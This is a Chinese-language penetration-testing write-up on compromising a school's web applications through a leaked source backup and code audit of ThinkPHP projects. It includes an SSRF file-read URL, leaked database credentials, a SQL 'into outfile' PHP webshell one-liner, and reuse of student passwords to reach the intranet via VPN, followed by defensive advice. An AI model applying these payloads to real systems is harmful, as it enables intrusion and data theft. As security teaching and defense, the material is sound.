通过代码审计完成的渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 基础信息收集<\/h3>
使用百度搜索目标学校相关站点<\/li>
收集目标域名：example.edu.cn<\/li>
使用子域名扫描工具<\/li>
进行C段扫描<\/li> <\/ul>
1.2 目录扫描<\/h3>
使用railgun工具对各个域名进行目录扫描<\/li>
发现备份文件泄露漏洞：
\/www.rar<\/code> 包含网站源码<\/li>
<\/ul>
2. 初步渗透尝试<\/h2>
2.1 备份文件分析<\/h3>

下载并解压www.rar备份文件<\/li>
发现三个可疑文件，实为通过phpmyadmin全局日志备份获取的webshell<\/li>
尝试使用菜刀连接，但shell被删除<\/li>
<\/ul>
2.2 数据库访问尝试<\/h3>

发现网站包含两个ThinkPHP框架的公众号后端和一个phpmyadmin<\/li>
从ThinkPHP数据库配置文件读取到MySQL账号：root\/root<\/li>
尝试登录phpmyadmin导出文件获取shell<\/li>
失败原因：管理员发现后修改了MySQL密码<\/li>
<\/ul>
3. 代码审计阶段<\/h2>
3.1 项目一审计<\/h3>
3.1.1 SQL注入漏洞<\/h4>

ThinkPHP版本：3.1.3（仅存在注入漏洞，无RCE）<\/li>
漏洞位置：IndexAction<\/code>类的content<\/code>方法<\/li>
<\/ul>
public<\/span> function<\/span> content<\/span>() {
<\/span><\/span>    $id =<\/span> $_GET['id'<\/span>];
<\/span><\/span>    $cate =<\/span> new<\/span> Model<\/span>("content"<\/span>);
<\/span><\/span>    $sql =<\/span> "Select c.CONTENT_ID,... where c.CONTENT_ID="<\/span>.<\/span>$id.<\/span>" and c.status=2..."<\/span>;
<\/span><\/span>    echo<\/span> json_encode<\/span>($cate-><\/span>query<\/span>($sql));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
漏洞利用：直接拼接用户输入的id<\/code>参数到SQL语句中<\/li>
<\/ul>
3.1.2 CSRF漏洞（难以利用）<\/h4>

发现httpGet<\/code>函数存在CSRF漏洞<\/li>
<\/ul>
private<\/span> function<\/span> httpGet<\/span>($url) {
<\/span><\/span>    \/\/ 省略curl设置
<\/span><\/span><\/span><\/span>    $res =<\/span> curl_exec<\/span>($curl);
<\/span><\/span>    return<\/span> $res;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
限制：由于是private<\/code>方法，无法直接调用<\/li>
<\/ul>
3.2 项目二审计<\/h3>
3.2.1 未授权访问漏洞<\/h4>

权限验证基类PublicAction<\/code>：<\/li>
<\/ul>
class<\/span> PublicAction<\/span> extends<\/span> Action<\/span> {
<\/span><\/span>    public<\/span> function<\/span> _initialize<\/span>() {
<\/span><\/span>        $name =<\/span> session<\/span>("name"<\/span>);
<\/span><\/span>        if<\/span>(!<\/span>$name){
<\/span><\/span>            $this-><\/span>redirect<\/span>('Admin\/Index\/login'<\/span>);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
多个类未继承验证类：<\/li>
<\/ul>
class<\/span> CommentAction<\/span> extends<\/span> Action<\/span>
<\/span><\/span>class<\/span> NewsAction<\/span> extends<\/span> Action<\/span>
<\/span><\/span>class<\/span> OrderAction<\/span> extends<\/span> Action<\/span>
<\/span><\/span>class<\/span> SystemAction<\/span> extends<\/span> Action<\/span>
<\/span><\/span>...<\/span>
<\/span><\/span><\/code><\/pre>3.2.2 任意文件删除漏洞<\/h4>

漏洞位置：SystemAction<\/code>类的rmdirr<\/code>方法<\/li>
<\/ul>
public<\/span> function<\/span> rmdirr<\/span>($dirname) {
<\/span><\/span>    if<\/span> (!<\/span>file_exists<\/span>($dirname)) return<\/span> false<\/span>;
<\/span><\/span>    if<\/span> (is_file<\/span>($dirname) ||<\/span> is_link<\/span>($dirname)) {
<\/span><\/span>        return<\/span> unlink<\/span>($dirname);
<\/span><\/span>    }
<\/span><\/span>    \/\/ 递归删除逻辑
<\/span><\/span><\/span><\/span>    return<\/span> rmdir<\/span>($dirname);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
利用方式：通过未授权访问直接调用该方法<\/li>
<\/ul>
3.2.3 请求伪造漏洞<\/h4>

漏洞位置：PublicAction<\/code>中的curl相关方法<\/li>
<\/ul>
public<\/span> function<\/span> getCurl<\/span>($url) {...<\/span>}
<\/span><\/span>public<\/span> function<\/span> postCurl<\/span>($url,$post_data) {...<\/span>}
<\/span><\/span>public<\/span> function<\/span> login_get<\/span>($url, $cookie) {...<\/span>}
<\/span><\/span>public<\/span> function<\/span> get_content<\/span>($url, $cookie) {...<\/span>}
<\/span><\/span><\/code><\/pre>
特别关注postCurl<\/code>方法会打印输出结果<\/li>
<\/ul>
3.2.4 文件读取利用<\/h4>

构造EXP读取数据库配置文件：<\/li>
<\/ul>
http:\/\/wx_xxxxxx_rtm\/index.php\/Index\/Search\/postcurl?url=file:\/\/D:\WWW\wx_xxxxxx_rtm\App\Conf\config.php&post_data=1
<\/code><\/pre>

获取数据库凭据：<\/li>
<\/ul>
'DB_USER'<\/span> =><\/span> 'root'<\/span>,
<\/span><\/span>'DB_PWD'<\/span> =><\/span> '123456789@abc'<\/span>,
<\/span><\/span><\/code><\/pre>4. 最终渗透<\/h2>
4.1 获取Webshell<\/h3>

使用获取的数据库凭据登录phpmyadmin<\/li>
执行SQL语句写入webshell：<\/li>
<\/ul>
select<\/span> '<?php eval($_GET[0]);?>'<\/span> into<\/span> outfile 'D:\\WWW\\1.php'<\/span>;
<\/span><\/span><\/code><\/pre>4.2 内网渗透<\/h3>

Web服务为system权限，但无法上线Cobalt Strike（已免杀）<\/li>
在数据库中发现学生用户明文密码<\/li>
使用学生凭证登录VPN<\/li>
发现VPN无隔离，可访问整个学校内网<\/li>
<\/ul>
5. 漏洞总结与防御建议<\/h2>
5.1 发现的主要漏洞<\/h3>

备份文件泄露<\/li>
MySQL弱口令<\/li>
SQL注入<\/li>
未授权访问<\/li>
任意文件删除<\/li>
请求伪造(CSRF)<\/li>
配置文件信息泄露<\/li>
VPN无隔离<\/li>
<\/ol>
5.2 防御建议<\/h3>


备份文件管理<\/strong><\/p>

禁止将备份文件存放在web可访问目录<\/li>
对备份文件进行加密或权限控制<\/li>
<\/ul>
<\/li>

数据库安全<\/strong><\/p>

避免使用root等高权限账户<\/li>
设置强密码并定期更换<\/li>
限制phpmyadmin等管理工具的访问<\/li>
<\/ul>
<\/li>

代码安全<\/strong><\/p>

使用预处理语句防止SQL注入<\/li>
对所有输入进行严格过滤<\/li>
避免直接拼接SQL语句<\/li>
<\/ul>
<\/li>

权限控制<\/strong><\/p>

统一权限验证机制<\/li>
确保所有需要权限的控制器继承验证类<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>

文件操作安全<\/strong><\/p>

限制文件删除等危险操作<\/li>
对用户输入的文件路径进行严格校验<\/li>
避免递归删除等危险功能<\/li>
<\/ul>
<\/li>

CSRF防护<\/strong><\/p>

为关键操作添加CSRF token<\/li>
限制curl等功能的访问权限<\/li>
避免直接输出curl结果<\/li>
<\/ul>
<\/li>

VPN安全<\/strong><\/p>

实施网络隔离<\/li>
使用多因素认证<\/li>
定期审计VPN访问日志<\/li>
<\/ul>
<\/li>

密码安全<\/strong><\/p>

禁止存储明文密码<\/li>
实施强密码策略<\/li>
定期更换密码<\/li>
<\/ul>
<\/li>
<\/ol>
6. 渗透测试方法论总结<\/h2>

信息收集是关键<\/strong>：全面的信息收集往往能发现意外漏洞<\/li>
不要忽视明显问题<\/strong>：备份文件泄露等"低级"错误仍然常见<\/li>
代码审计是深入渗透的有效途径<\/strong>：当常规方法失效时，代码审计能发现隐藏漏洞<\/li>
漏洞组合利用<\/strong>：单个漏洞可能无法直接利用，但组合多个漏洞可达成目标<\/li>
内网渗透思路<\/strong>：从外网到内网，从Web到系统，再到整个内网<\/li>
<\/ol>